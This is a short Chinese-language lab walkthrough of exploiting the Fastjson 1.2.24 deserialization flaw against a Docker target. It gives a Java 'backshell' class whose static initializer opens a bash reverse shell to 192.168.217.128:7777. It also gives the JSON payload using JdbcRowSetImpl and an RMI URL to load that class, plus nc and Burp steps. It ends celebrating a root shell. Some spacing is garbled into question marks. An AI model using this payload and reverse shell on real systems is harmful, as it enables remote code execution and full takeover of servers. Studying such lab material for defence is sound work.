Fastjson-1.2.24-RCE

一、环境搭建

机器：kali Linux

Java：jdk8

python：python3.7.x

二、搭建靶机环境

在docker里面搭建一个靶机环境

看看能不能访问

三、构建payload

将下列代码放进backshell.java

import java.lang.Runtime;
import java.lang.Process;

public class backshell {
??? static {
??????? try {
??????????? Runtime rt = Runtime.getRuntime();
??????????? String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.217.128/7777 0>&1"};
??????????? Process pc = rt.exec(commands);
??????????? pc.waitFor();
??????? } catch (Exception e) {
??????????? // do nothing
??????? }
??? }
}

用javac进行编译

查看编译是否成功

放进kali里面查看

四、用python搭建恶意站点

五、用插件开启rmi监听

六、用nc开启监听

七、用BP抓包

用BP抓包，然后修改POST传参方法，放到重放器模块，写入恶意类

{??? "b":{??????? "@type":"com.sun.rowset.JdbcRowSetImpl",??????? "dataSourceName":"rmi://192.168.217.128:9999/backshell",??????? "autoCommit":true??? } }

修改数据类型为json，点击发送

八、查看监听的shell

?发现反弹shell成功，命令符在手，还是root权限，一切你说了算！